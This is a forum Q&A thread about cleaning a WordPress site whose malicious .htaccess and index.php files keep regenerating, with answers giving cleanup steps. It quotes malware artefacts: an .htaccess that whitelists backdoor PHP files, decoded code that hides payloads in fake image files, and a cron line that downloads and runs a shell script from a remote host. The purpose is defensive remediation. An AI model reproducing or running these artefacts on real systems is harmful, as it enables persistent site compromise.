Hacked Wordpress .htaccess [closed]

Question

I have a wordpress site that features a .htaccess and a file called postfs.php. But when I try to delete them, they are written again. I tried to delete all the files on the site, change permissions, check the cron ... but nothing to do. These files appear as soon as I delete or edit them.

The contents of the file are as follows:

.htaccess:

 <FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.$
 Order allow,deny
 Allow from all
</FilesMatch>
AddType application/x-httpd-cgi .sh
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

And the postfs.php have that content: PHP Decode

How can avoid the restoring of this files? Has anyone had similar experiences?

Answer 1

I had the same problem and the antivirus was not able to detect it and also the problem of automatically creating files was not related to CronJobs, as friends mentioned. In fact, every time a page is opened from the site, those files are rebuilt.

I have carefully examined the issue and offer the solution.

The problem occurs for both .htaccess and index.php.

First we search for a keyword in the text of the file:

# grep -lir "wjsindex.php" ./
./wp-admin/images/arrow-rights.png
./wp-includes/images/smilies/icon_crystal.gif
./.htaccess

For another file, we search for a keyword in the text:

# grep -lir "RZXiMOEbYmVH" ./
./wp-admin/images/arrow-lefts.png
./index.php
./wp-includes/images/smilies/icon_devil.gif

If you look at the contents of these found image files, you will see that they are not images and contain malicious code that exactly matched our two original files.

Sample:

We now search for all four files found:

# grep -lirE "arrow-rights.png|icon_crystal.gif|arrow-lefts.png|icon_devil.gif" ./
./wp-includes/load.php
./wp-includes/template-loader.php

If you edit these two results files. At the bottom of the file load.php and at the beginning of the file template-loader.php you will see the extra code that needs to be removed. (Starting with //ckIIbg)

To find out more exactly which sections are correct and which are malicious, just replace that file from another WordPress that you are sure is safe and the same version, or find and remove the extra sections with the diff command.
Thus:

# diff  ./wp-includes/load.php ~healthy/www/wp-includes/load.php
# diff  ./wp-includes/template-loader.php ~healthy/www/wp-includes/template-loader.php

And as a final step, delete the four malicious image files:

# rm -f ./wp-admin/images/arrow-rights.png ./wp-includes/images/smilies/icon_crystal.gif ./wp-admin/images/arrow-lefts.png ./wp-includes/images/smilies/icon_devil.gif

Edited:

And also check cronjobs (/var/spool/cron/username) for be like this infected line and remove it:

* * * * * wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home//username/public_html 24 && rm -f xxxd

This code create a ./css/index.php file and can be deleted.

Answer 2

If files start reappearing after you deleted them you should look out for lines of code - often in the index.php file - where a time-limit or a TTL (Time To Live) is specified, along with a (most of the time) very long line of base64 code. (These are often recognizable by a couple of shorter lines of code with 'equal-to' signs in the middle.) The way this works is the time-limit / TTL makes sure all files are held up against a reference set of files located either on another url or in the webservers cache, and if one is missing it will sync itself back.

One thing you can do to solve this is deleting the script together with restarting apache and php / nginx. This cleans out the webservers cache. After that you can clean out the malicious deny allow rules and stuff that's in the .htaccess files and probably other stuff that's lurking between the files and folders of your webapplication.

Bonus suggestions to really try and solve the actual security issue here:

1. Always make sure ALL software / plugins / modules / themes / etc. is up to date. Don't miss out on any security patches!

2. Make sure to change every password on every account providing access to your webapplication. (don't forget the FTP accounts and backend panels and stuff).

3. Try to run a malware scan (if you have a shared hosting package you might do so through a security plugin, or ask your hosting company to run one)

4. Make sure there aren't any users, plugins, or any other possibly malicious components you've never heard of and haven't installed!

5. At least make sure to check the root folder, all upload folders, and the temporary folders for malicious files.

I hope this helps out others with similar issues!

Answer 3

We had the same exact hack a while ago The first step is to decode the index.php file, and after decoding we see that there are 4 infected image files

file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);

First delete the infected 4 images, and check your cron and delete any cron job you didn't create.

Run this ssh to delete all .htaccess files within all sub directories

find . -type f -perm 0444 -name ".htaccess" -exec echo rm {} \;

Use the default wordpress .htaccess, and index.php files.

After finishing, you can install wordfence, and activate the firewall, also don't forget to update your wordpress core, plugins, and themes.

Answer 4

in the first step, you should find shell file (your host provider can does it with antisheller )

1.remove unused theme and plugin in the WordPress 2.login in SSH area and run this command `find /home/.../wordpres_directory -type f -name ".htaccess" -delete

3.open the updated page with this link youdomain/tld/wp-admin/update-core.php?action=do-core-reinstall

if you still see the problem you should do step 2 and 3

your server need security config, call to host provider to secure the server

Answer 5

You must search for every .htaccess file and use an FTP client and deleted it. (almost 5000 in my case) Upgrade plugins to solve security breaks.

Answer 6

Dunno if this is still active, but if someone comes across this. This was how I solved this:

1. First isolate the website to my IP so I could work alone.
2. Removed WP installed keept wp-content.
3. Updated WP manual trough FTP.
4. Repair / recreate DB.
5. Deactivate all plugins.
6. Disable themes simplest way is just to tmp change the name on the themes folder to _theme istead of themes.
7. Update all plugins.
8. Checked active theme folder for changed date. Found a folder in my inc folder that had a index.php and forge.php. Removed those.
9. Lastly checked root folder again. Found a folder called CSS removed that aswell since that also had php files that did not belong.
10. Removed htaccess files according to above.
11. Recreated htaccess file.
12. Activated all plugins and themes.
13. Checked once more for file changes is I had missed anything.
14. Allow traffic to site once more and keep an eye on access.log for wierd requests.

Maybe don't help everyone but this worked fine for me and no traces are left.

GLHF!

Answer 7

Ultimately.. none of them work. Follow this option and keep monitoring the .htaccess and index.php file in the respective domain folder where you see this issue.

1. Dont uninstall / drop the wordpress installation. All the records stored will be gone.
2. Take a backup of the DB file from MySQL, by looking for the DB mapped to the domain
3. Now create a new sub-domain
4. Install wordpress mapped to the sub-domain
5. import the db to the newly created DB [against the new WP instance]
6. create the respective views... you will have to open the sql file and change the user / dbname against the views created and manually restore them
7. once all the above done, now open the table wpxx_options and update the 2 records with the new sub-domain name

8.Now go to WP and add the theme which you had installed earlier [dont use a new one]

9. Install only the required plugins and not all as you did earlier installation

10. go to wp_content folder [from earlier installation] and get all the media files and copy them to the wp_content folder [1999,2000,20xx...] folders is what I meant and not all

11. finally go to your wp-config.php and change the table prefix to the new one //$table_prefix = 'wpxx_'; //old one $table_prefix = 'wp1234_'; // new one

with this I think it should work.

Had tried by removing the files and uninstalling all, including domain and restored.. the same junk info gets updated in the two files [.htaccess and index.php].. so had to follow the above steps.. its working for now.. have to keep monitoring the above files. Hope it works for you too..if you have additional findings.. do update here

Answer 8

You might have a cronjob that keeps on adding the .htaccess files, lookuout for a cronjob with a wget request to hello.turnedpro.xyz.

If you are using cpanel you can reset your cpanel account password and run antimalware scan for any keyloggers/malware .e.g redline stealer.

Answer 9

I had the very same problem, In my case, I had several wp sites under one user, very convenient for me to maintain the sites, but made the clean up more tricky, sort of whack a mole situation.

Both malicious .htaccess and index.php were regenerating as soon as they were deleted. What I did was look for all the radio.php and about.php with malicious code (easy to find because they are bigger in size and out of place) and also found some folders called "maint" with files with malicious code. After cleaning this, the .htaccess and index.php infected did not regenerate anymore, so after copying the fresh wp files, everything was fine, and was able to access wp-admin correctly.

in one particular wp folder, even deleting all the files, infected .htaccess and index.php files were still regenerating, so what I did was to delete the root folder containing the WP install and create a new one with a different name, and after pointing the domain name to the new folder, voila! all fine!

Answer 10

Today I found a WordPress 5.7.5 Infected, all Htaccess files had permissions for malicious files in the whole menu panel, and then backed up everything, I found several files with strange names that were infected in the root and other locations, I removed, I changed all the passwords, I downloaded the official installation WordPress 5.7.5, I deleted the WP-admin folder and I sent from the official installation in this Paniel normalized and I could update all the plugins, so I did the same with WP-includes, already the WP-content I requested the hosting that runs the find command to delete all htaccess so I did upgrade to a new version.

Answer 11

i solved problem

create new FTP account and editing htacceess and index.php whit Filezila . then you should deletin wp-admin and uploading new file and folder by new version wordpress. also wp-include . and then you can